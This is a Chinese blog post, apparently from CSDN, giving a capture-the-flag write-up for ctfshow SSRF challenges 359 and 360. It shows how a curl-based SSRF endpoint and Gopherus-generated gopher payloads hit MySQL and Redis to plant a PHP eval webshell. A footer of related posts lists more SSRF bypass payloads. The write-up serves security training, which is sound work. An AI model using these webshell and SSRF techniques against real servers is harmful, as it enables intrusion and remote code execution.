ctfshow web入门ssrf359,360

最新推荐文章于 2023-05-22 17:45:40 发布
最新推荐文章于 2023-05-22 17:45:40 发布
阅读量860 收藏
点赞数 1
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaolong22333/article/details/113727319
版权

记录一下做法,原理啥的还有点懵

web359

打开是登录框,先随便输点什么,然后抓包
发现有个returl参数,并且可以随意更改url,这应该就是我们的利用点了

然后就是gopher协议打mysql,这里用到这个工具gopherus

python gopherus.py --exploit mysql

生成一句话木马

select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/2.php';

在这里插入图片描述
记得把_后面那一大段内容再url编码一次,发送
在这里插入图片描述
访问2.php,cat一下
在这里插入图片描述

web160

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

跟上题一样,只不过换成打redis

python gopherus.py --exploit redis

生成一句话木马

<?php eval($_POST['cmd']);?>

在这里插入图片描述
同样后面那一大段东西要url编码后发送

在这里插入图片描述
然后访问shell.php(默认生成就是shell.php)

在这里插入图片描述

xiaolong22333
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow SSRF(web351-360)
Kradress的博客
03-17 667
表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。
ctfshow web入门ssrf
xiaolong22333的博客
04-28 941
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
ctfshow web入门 ssrf web351~web360
qq_62989306的博客
09-13 1105
ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……
ctfshow-web入门-ssrf-351--360
yutianovo的博客
01-14 767
Web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 使用 file
ctfshow SSRF web351-web360 wp
mumuzi的博客
02-10 3765
WDNMD(We Did Nothing Means Done)
ctfshow-web入门 ssrf篇
volcano的博客
03-06 2442
ctfshowSSRF简介危害web351web352parse_urlweb353更改IP地址写法web354web355web356web357web358web359(打无密码的mysql)web360(打redis) SSRF 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 危害 SSRF可以对外网、
【CTFshow】SSRF web351-360wp
weixin_51614272的博客
03-06 413
目录web351、352、353 、355、356web354、357web358web359360 具体解析请查看这里:点击此处 web351、352、353 、355、356 url=http://0/flag.php url=http://0.0.0.0/flag.php url=http://127.1/flag.php url=http://2130706433/flag.php url=http://017700000001/flag.php url=http://0b111111100000
CTFshow刷题日记-WEB-SSRF(web351-360SSRF总结
Love&Share
09-28 5960
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
CTFSHOW-WEB入门代码审计篇
Re_ly0n的博客
11-02 463
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctfshow web入门 代码审计
最新发布
12-10
CTF比赛中的Web入门题目通常是一些简单的Web应用程序,可以通过代码审计来发现漏洞并获取flag。 以下是一些常见的Web漏洞和审计技巧: 1. SQL注入:通过构造恶意的SQL语句来绕过应用程序的身份验证和访问控制。...
ctfshow web入门 序列化
Lumos427的博客
02-25 1442
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
CTFSHOW WEB题目
qq_45655564的博客
08-09 2902
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
CTFshow-WEB入门-SSRF
feng的博客
02-18 1572
前言 开始学习SSRF,学习文章: SSRF 学习记录(需要fq) 比较简单的题目就直接放payload了,不做解释。 web351 url=http://127.0.0.1/flag.php web352 scheme必须是http或者https,但是不能有127.0.0.1或者localhost。这个绕过技巧很多了,列具一些常用的吧: 进制绕过 url=http://0x7F000001/flag.php 0.0.0.0绕过 url=http://0.0.0.0/flag.php 短标签绕过,但是这
ctfshow SSRF web351~360
shinygod的博客
09-25 1298
SSRF练习和学习
CTFshow之SSRF
读万卷书,行万里路。
09-04 502
文章目录1 web3512 web3523 web3534 web3545 web3556 web3567 web3578 web3589 web35910 web360 其他师傅都写得很详细了,只是做个简单的笔记。 1 web351 POST url=file:///var/www/html/flag.php 2 web352 只限制了协议。 url=http://127.0.0.1/flag.php 3 web353 十六进制表示: url=http://0x7F000007/flag.php
ctfshow web入门 SSRF
Sentiment的博客
12-09 773
web351
【CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1074
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
SSRF-CTFshow
unexpectedthing的博客
10-20 599
文章目录CTFshowweb351web352web353web354web355web356web357参考文献 CTFshow 对SSRF,比较重要的就是先尝试每一个协议是否可以使用。 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url);//初始化一个curl的会话 curl_setopt($ch, CURLOPT_HEADER, 0);//对会话进行
SSRF之GOPHER协议利用
qq_61553520的博客
05-22 527
GOPHER协议是一种比HTTP协议还要古老的协议,默认工作端口70,但是gopher协议在SSRF漏洞利用上比HTTP协议更有优势。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值